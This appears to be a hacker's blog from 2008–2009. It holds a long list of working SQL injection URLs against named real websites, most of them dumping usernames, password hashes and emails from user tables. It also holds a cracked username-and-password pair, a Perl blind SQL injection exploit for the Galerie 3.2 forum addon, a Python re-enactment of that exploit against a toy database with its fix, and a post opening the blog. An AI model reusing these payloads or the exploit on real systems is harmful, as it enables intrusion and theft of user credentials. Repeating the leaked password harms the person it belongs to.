A few SQL injections

Hi,

Since August/September 2008 was holiday time and I had enough time then to do and practise a few SQL injections, here is a small list. As said, the SQL injections are from August/September 2008, so I don't know exactly whether most of them have already been fixed 🙂

http://www.kidtokid.com/news.php?id=-13/**/UNION/**/SELECT/**/unhex(hex(version())),unhex(hex(concat_ws(0x3a,username,user_password))),3,4,5,6,7,8,9/**/FROM/**/kidtokid_com_phpbb.users/**/limit/**/1,1/*
http://www.kidtokid.com/news.php?id=-13/**/UNION/**/SELECT/**/unhex(hex(version())),unhex(hex(concat_ws(0x3a,login,pass))),3,4,5,6,7,8,9/**/FROM/**/kidtokid_com_site.stores/*
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,name,username,email,password),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_1.mos_users--
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,name,pw),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_1.users/**/limit/**/1,1--
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,email,passwd),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_2.fc1_user--
http://www.schnittberichte.com/schnittbericht.php?ID=-4539+union+select+concat_ws(0x3a,user_id,username,user_password)/**/FROM/**/sc003clu_forum.phpbb_users/**/LIMIT/**/1,1/*
http://www.squadhouse.de/index.php?id=56&srid=-9/**/UNION/**/SELECT/**/version(),2,3,4,5,concat_ws(0x3a,uid,username,pass,email),7,8/**/FROM/**/sqhdatabasev3.user_main--&ac=details 
http://www.versalia.de/forum/beitrag.php?board=v_forum&thread=-3617%27)/**/UNION/**/SELECT/**/concat_ws(0x3a,username,password,email),2,3,4/**/FROM/**/xc_users/**/LIMIT/**/1,1/*
http://www.aktionbildung.de/seiten/newslesen.php?id=-91+union+select+1,2,3,concat_ws(0x3a,username,password,email)+from+forums_auth--
http://royal-esports.de/index.php?section=wars_detail&match_id=-43%27/**/UNION/**/SELECT/**/1,2,3,4,nick,password,email,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/**/FROM/**/lh_member--+
http://www.chaoskrieger.com/downloads.php?action=filedetails&fileid=-36'/**/UNION/**/SELECT/**/1,2,password,concat_ws(0x3a,username,password),5,email,7,8,9,10,11,12/**/FROM/**/bb1_users/**/WHERE/**/userid=6--+
http://www.die-webber.com/downloads.php?action=filedetails&filepid=-10%27/**/UNION/**/SELECT/**/1,version(),username,pass/**/FROM/**/dw_users/**/LIMIT/**/0,1/*
http://sdf.die-webber.com/index2.php?content=members&action=details&id=-34/**/UNION/**/SELECT/**/1,2,version(),4,5,6,email,8,9,10,11,user,13,14,15,16,17,18,19,20,21,pass,23,24,25,26,27,28,29,30/**/FROM/**/sdf_users/**/LIMIT/**/0,1/*
http://www.counter-strike.de/modules/screenorama/gallery.php?katwahl=-5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.counter-strike.de/modules/screenorama/gallery.php?katwahl=-5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,unhex(hex(version())),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.kleinsche-flasche.de/admin/detail.php?id=-10/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.mrgame.de/gamedownload2.php?id=-375/**/UNION/**/SELECT/**/1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19/*
http://www.mrgame.de/gamedownload2.php?id=-375/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/usr_wsa17_2.mrgame_phpbb_users/**/LIMIT/**/1,1/*
MD5 a4ae46449f1074967bb1376d81335f69 - gdataonline.com: 89024703
http://www.sixpacks.org/index.php?page=showquiz&qid=-103/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://gameresource.de/out.php?news=-104999/**/UNION/**/SELECT/**/1,2,VERSION(),0x27,0x27,0x27,7,8,9,10,11,12/*
http://www.gamaxx.de/send.php?news=-19494/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,unhex(hex(concat_ws(0x3a,username,password,salt,email))),10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/foren_user/*
http://bgs.gdynamite.de/send.php?news=-8727/**/UNION/**/SELECT/**/1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.zocko.de/forum/galerie.php?action=show&pic=10%27%20and%20ascii(substring((SELECT%20password%20from%20bb1_users%20limit%200,1),32,1))=54/*
User: BartTheDevil89
PW: 72bb3fc06c63e9ad6957d81747fc29f6 = randy01
http://www.finanzsoftware24.de/download.php?id=-381/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,username,user_password,user_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/FROM/**/biusoft_forum.phpbb_users/**/LIMIT/**/1,1--
http://zidz.com/munity_user.php?me=1%27/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,version(),concat_ws(0x3a,nic,pass),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/**/FROM/**/user/**/LIMIT/**/1,1/*&show=steckbrief
http://www.radioquintessenz.de/djs.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version(),5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/FROM/**/qe_forum.bb1_users--
http://www.luftfahrt.net/flugzeuge/flugzeug.php?id=-6/**/UNION/**/SELECT/**/1,concat_ws(0x3a,email,passwort),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/members/**/LIMIT/**/0,1/*
http://www.wochenspiegel-saarland.de/index.php?id=43&doc=-81980/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,unhex(hex(version())),12,13,14,15,16,17,18,19,20,21,22,23/*
http://www.radio7.de/moderatorsDetail.php?mid=-12/**/UNION/**/SELECT/**/1,unhex(hex(concat_ws(0x3a,loginname,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/admin_user/*
http://www.gamecaptain.de/download.php?id=-4744/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password,salt),10,11,12,13,14,15,16,17,18/**/FROM/**/vbb_user/**/LIMIT/**/1,1--
http://www.serienoldies.de/gb/kommentar.php?id=-6178/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,username,pwd,email),7,8,9,10,11,12,13/**/FROM/**/pfuser/*
http://www.keindsl.de/kommentar.php?id=-541/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,username,user_password),7,8,9,10,11,12,13/**/FROM/**/phpbb_beta_5_users/**/LIMIT/**/1,1/*
http://www.gameradio.de/kommentar.php?news_id=-90/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10/*
http://www.jugendbibliothek-gera.7to.de/pgb/kommentar.php?id=-21/**/UNION/**/SELECT/**/1,2,3,4,version(),unhex(hex(concat(name,0x3a,passwort))),7,8,9,10,11,12,13,14,15/**/FROM/**/yuri_user/*
http://gaestebuch.ruebenlauf.de/kommentar.php?id=-117/**/UNION/**/SELECT/**/1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15/*
http://www.infoportal24.org/kommentar.php?id=-4397%27/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7/*
http://www.fg-schwingenheuer.de/blog/kommentar.php?id=-125/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,concat_ws(0x3a,benutzer,passwort),15,16,17,18,19,20/**/FROM/**/usr_web148_2.login/*
http://www.subba-cultcha.com/article_feature.php?id=-5420/**/UNION/**/SELECT/**/1,concat(email,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/*
http://gw.buffed.de/daten/bosse/index.php?kapitel=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,password,email,icq,salt),5+FROM+user+LIMIT+0,1
http://www.ka-nightlife.de/locations.php?id=-5/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/**/from/**/bb1_users/**/limit/**/0,1&sid=
http://trekstor.de/de/products/detail_mp3.php?pid=-88/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.freebooknotes.com/book.php3?id=-32/**/UNION/**/SELECT/**/1,2,3,version()--
http://www.heavymetal.dk/links_bands_view.php?id=-286)/**/UNION/**/SELECT/**/1,2,version(),concat_ws(0x3a,username,password,email),5,6,7,8,9,10,11,12/**/FROM/**/users--
http://www.gamingguide.de/forum/index.php?page=XboxRanking&sortField=10%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%200,1),1,1)=0x43,NULL,(select%201%20union%20select%202))&sortOrder=ASC
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,UserName,UserPass),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.test_scout_users/*
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.forum_users/**/LIMIT/**/1,1/*
http://boutiqueportal.com/index.php?main_page=customer_testimonials&testimonial_id=-1/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,admin_name,admin_pass,admin_email),version(),5,6,7,8/**/FROM/**/zen_admin/*
http://www.sbcommunicationsgroup.com/media-info.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version()/*
http://choices.de/kritik.php?id=122563/**/UNION/**/SELECT/**/1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
http://www.larsie.de/include.php?path=vote/archiv.php&vid=5%27)/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user_name,user_pw),3,4,5,6,7,8,9,10,11/**/FROM/**/sun25_usr_web201_3.phpkit_1_user+--+
------------
December 2008:
 
http://www.clanscripte.net/main.php?content=newskommentare&action=view&newsid=-570/**/UNION/**/SELECT/**/1,version(),concat_ws(0x3a,name,pwd,email),4,5,6/**/FROM/**/csportal_users--
http://www.handit.de/index.php?fuseaction=detail&produktid=-5333+group%20by%20null+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19/*
http://privatamateure.com/show_message.php?messageid=-7016123/**/UNION/**/SELECT/**/1,2,3,version(),unhex(hex(concat_ws(0x3a,nickname,email,password))),6,7,8,9,10/**/FROM/**/user/*&kind=1
http://sig-box.de/?typ=tag&s=search&add=add&search=0%27%20UNION%20SELECT%200x27756E696F6E2073656C65637420312C322C332C342C352C362C76657273696F6E28292C382023,2%20--+

My first exploit

Hi,

here is my first exploit, which was published on milw0rm on 05.10.2008 🙂

Once again many thanks to electron1x for his great help with this exploit; without him I certainly wouldn't have managed it (so quickly)! 🙂

Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection Exploit

#!/usr/bin/perl
#####################################################################################
#
#    Galerie 3.2 (galerie.php) Remote "Blind" SQL Injection
#
#    found by: J0hn.X3r
#    exploit written by: J0hn.X3r and electron1x
#    Date:     05.10.2008
#    Dork: "Galerie 3.2 © 2004 by progressive"
#
#    Contact:
#       J0hn.X3r
#            [+] ICQ:   573813
#            [+] Mail:  J0hn.X3r[at]gmail.com
#       electron1x
#            [+] Mail:  electron1x *at* mail *dot* ru
#
#    Greetz to: nexos, Barbers, -tmh-, Patrick_B, Sector, Loader007, n00bor
#               Mac_Hack, Five-Three-Nine, f0Gx, bizzit, h0yt3r, no_swear_ftW,
#               Lidloses_Auge, Sys-Flaw, Free-hack, Universal Crew & rest :-)
#
#####################################################################################
#
#  First, Galerie 3.2 is an addon for Burning Board Lite.
#
#  http://www.site.com/galerie.php?action=show&pic=10
#
#  If we add a ' to the pic id we get an SQL Error. But the Query is an UPDATE Query, so we can't use UNION.
#
#  We have to try it with a Blind SQL Injection.
#  ( that slow and shitty subquery thingy ;) )
#
#  injection:
#  http://www.site.com/galerie.php?action=show&pic=10'/**/and/**/ascii(substring((SELECT/**/password/**/from/**/bb1_users/**/WHERE/**/userid=1),1,1))>1/*
#
#####################################################################################
 
use strict;
use warnings;
use LWP::UserAgent;
 
banner();
 
my $url      = shift || usage($0);
my $usr_id   = shift;
my $keyspace = "0123456789abcdef";   # WBB Lite stores plain MD5: 32 hex digits
 
$usr_id = 1 unless ( $usr_id and $usr_id =~ /^\d+$/ );
$url    = 'http://' . $url unless ( $url =~ m{^https?://} );
$url    =~ s{/+$}{};                 # strip a trailing slash, "/galerie.php" is appended below
 
 
# global vars...
# {id}, the bb2 prefix and the substring offset get patched in once we know them
our @url          = ( "$url/galerie.php?action=show&pic={id}%27+and+ascii(substring((SELECT+password+from+bb2_users+where+userid=$usr_id),1,1))", '', '/*' );
our $ua           = LWP::UserAgent->new;
$ua->agent('Mozilla/4.8 [en] (Windows NT 6.0; U)'); # btw we dont use windows ..
 
# regexes..
our $regex        = 'Bild\ \d+\ von\ (\d+)';   # a positive "Bild N von M" count means the injected condition was true
my  $prefix_regex = '(\w+)_galeriedata';        # the SQL error message leaks the table prefix
my  $regex_id     = 'pic=(\d+)';
 
my  $prefix       = '';
my  $pic_id       = '';
 
print "[~] Preparing attack...\n";
my $r = $ua->get($url . "/galerie.php?action=show&pic=%27");
        die   "\t[!!] Couldnt connect to $url!\n"             unless ( $r->is_success );
        die   "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /$prefix_regex/ );
        print "\t[*] Target seems to be vulnerable\n";
        $prefix = $1;
        $url[0] =~ s/bb2_users/${prefix}_users/;
 
$r    = $ua->get($url . "/galerie.php");
        die   "\t[!!] Couldnt get a valid pic-id\n" unless ( $r->content =~ /$regex_id/ );
        $pic_id = $1;
        $url[0] =~ s/\{id\}/$pic_id/;
 
        print "\t[*] Using table prefix $prefix\n";
        print "\t[*] Using pic-id $pic_id\n";
 
 
print "[~] Unleashing Black Magic...\n";
        print STDERR "\t[*] Getting Hash "; 
 
 
# one binary search per hash position: substring(..., $_, 1)
my $ks = build_array($keyspace);
for ( 1..32 ) {
        $url[0] =~ s/\),\d{1,2},/\),$_,/;
        blind( $ks, 0, $#{$ks} );    # upper bound is the last valid index, not 16
}
print "\n";
 
 
 
sub banner
{
        print "[~] Galerie 3.2 WBB Lite Addon Blind SQL-Injection Exploit\n";
        print "[~] Written by J0hn.x3r and electron1x\n\n"
}
 
sub usage
{
        my $script = shift;
        print "[*] Usage\n" ,
                        "\t$script <host> <opt: user id>\n" ,
                        "\tuser id defaults to 1\n" ,
              "[*] Examples\n" ,
                        "\t$script http://example.com/forum/ 2\n" ,
                        "\t$script localhost/board/\n" ,
                        "\t$script localhost 31337\n";
        exit(0);
}
 
 
 
sub blind
{
        my ( $keyspace,  $bottom, $top ) = @_;
        my $center = int( ($bottom+$top)/2 );   # int() has to wrap the whole division
        print STDERR chr $$keyspace[$center];
        if ( request($$keyspace[$center], '=')) {
                return;
        } elsif ( $top-$bottom > 0) {
                        print STDERR "\b";
                        # not smaller than the pivot -> upper half, otherwise lower half
                        return blind($keyspace, $center+1, $top   )
                                unless  (  request($$keyspace[$center], '<') );
                        return blind($keyspace, $bottom, $center-1);
        } else {
                print STDERR "\n[!!] Something went wrong, dunno what..\n";
                exit(1);
        }
}
 
sub build_array
{
        # the keyspace as a numerically sorted list of ascii codes, so blind() can bisect it
        my @sorted = sort { $a <=> $b } map { ord($_) } split //, $_[0];
        return \@sorted;
}
 
 
sub request
{
        my ( $key, $flag ) = @_;
        my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]);
        my ($count) = $r->content =~ /$regex/;  # undef when the page did not render "Bild N von M"
        return ( defined $count && $count > 0 );
}
 
__END__
 
# milw0rm.com [2008-10-05]

Exploit Link: http://milw0rm.com/exploits/6675

Author Link: http://milw0rm.com/author/1639
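The header of the script explains the whole idea: the injection point sits in an UPDATE, so nothing can be read back through a UNION, and every character of the hash has to be asked for as a yes/no question. Here is that extraction as an added example in Python against an in-memory SQLite database; it is not the author's code and not a working exploit against any real board. show_pic_vulnerable mirrors the gallery's hit-counter UPDATE, and the assumption that the page shows a positive "Bild N von M" exactly when the WHERE clause matched is modelled as "did the UPDATE touch a row" (the Perl checks the same thing with a regex on the response). char_at is the same 16-character binary search as the script's blind(), and show_pic_fixed is the one-line repair. SQLite's unicode() and substr() stand in for MySQL's ascii() and substring(); the table names, the user row and its MD5 are constructed.

```python
import sqlite3

HEX = "0123456789abcdef"   # an MD5 only ever contains these, and they are already in ord() order

# Constructed sample data (no real board): the Burning Board Lite users table the
# exploit reads and the gallery table whose UPDATE is injectable.
def make_board():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE bb1_users(userid INTEGER, username TEXT, password TEXT);
        INSERT INTO bb1_users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        CREATE TABLE bb1_galeriedata(pic INTEGER, hits INTEGER);
        INSERT INTO bb1_galeriedata VALUES (10, 0);
    """)
    return db

def show_pic_vulnerable(db, raw_pic):
    """galerie.php?action=show&pic=... : the hit counter is bumped with an UPDATE
    built from the raw parameter. An UPDATE returns no rows, so UNION is useless;
    all that leaks is whether the WHERE clause matched, which here stands in for
    the page rendering a positive 'Bild N von M'."""
    cur = db.execute("UPDATE bb1_galeriedata SET hits=hits+1 WHERE pic='%s'" % raw_pic)
    return cur.rowcount > 0

def show_pic_fixed(db, raw_pic):
    """Bound parameter: the whole string is compared as a value, none of it is parsed as SQL."""
    cur = db.execute("UPDATE bb1_galeriedata SET hits=hits+1 WHERE pic=?", (raw_pic,))
    return cur.rowcount > 0

def make_oracle(db, view, userid):
    """One boolean question per request: is ascii(hash[pos]) <op> value ?
    The trailing /* swallows the closing quote the application appends."""
    calls = [0]
    def oracle(pos, op, value):
        calls[0] += 1
        payload = ("10' AND unicode(substr((SELECT password FROM bb1_users WHERE userid=%d),%d,1))%s%d/*"
                   % (userid, pos, op, value))
        return view(db, payload)
    oracle.calls = calls   # request counter, for the cost comparison below
    return oracle

def char_at(oracle, pos):
    """Binary search over the sorted alphabet: four '<=' requests pin the character,
    one '=' request confirms it. Returns None when the oracle never agrees, which
    is what a parameterised target looks like."""
    lo, hi = 0, len(HEX) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, "<=", ord(HEX[mid])):
            hi = mid
        else:
            lo = mid + 1
    return HEX[lo] if oracle(pos, "=", ord(HEX[lo])) else None

def dump_hash(db, view, userid=1, length=32):
    """The 32-character MD5 of the user, or None when the page never reacts."""
    oracle = make_oracle(db, view, userid)
    out = []
    for pos in range(1, length + 1):
        c = char_at(oracle, pos)
        if c is None:
            return None
        out.append(c)
    return "".join(out)

if __name__ == "__main__":
    db = make_board()
    oracle = make_oracle(db, show_pic_vulnerable, 1)
    print("first char:", char_at(oracle, 1), "after", oracle.calls[0], "requests")
    print("vulnerable:", dump_hash(db, show_pic_vulnerable))
    print("fixed     :", dump_hash(db, show_pic_fixed))
```

Per character the search costs four comparisons plus one confirmation, so a 32-character MD5 takes about 160 requests instead of the up to 16 per character a linear scan would need; that is the whole reason the Perl bisects a sorted keyspace instead of trying the digits in order. Against the parameterised query the oracle never answers yes, so the confirmation fails on the first position and dump_hash gives up.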

Blog opened!

Heyho,

So now, finally, after 13 days of delay, my blog opens too. Originally 1.1.2009 was the start date, but my hoster *cough* had problems with the server. After that I also had to wait because of Moneybookers and the domain, which again took days. Now, today, after 13 days, almost everything seems to be running 🙂 Hosting is done by Sebo (many thanks for this), since I have complete trust in his work.

What awaits you here?

As is easy to see, this will mainly be about web vulnerabilities, i.e. how I carry out SQL injections (a detailed self-made beginner tutorial will follow), XSS and why "scripts" get executed there, and a lot more 🙂 Hopefully it will be interesting for you, perhaps above all for beginners. Interesting exploits, self-written exploits, "scene news" and interesting security holes on websites found by me will also be published here.

I hope you like (or will like) my blog; I'm always open to feedback and hope you drop by regularly 🙂

J0hn.X3r

P.S.: If you are here because of carding, faking, CCs or the like, please click the X at the top right, because then you are in the wrong place! 😉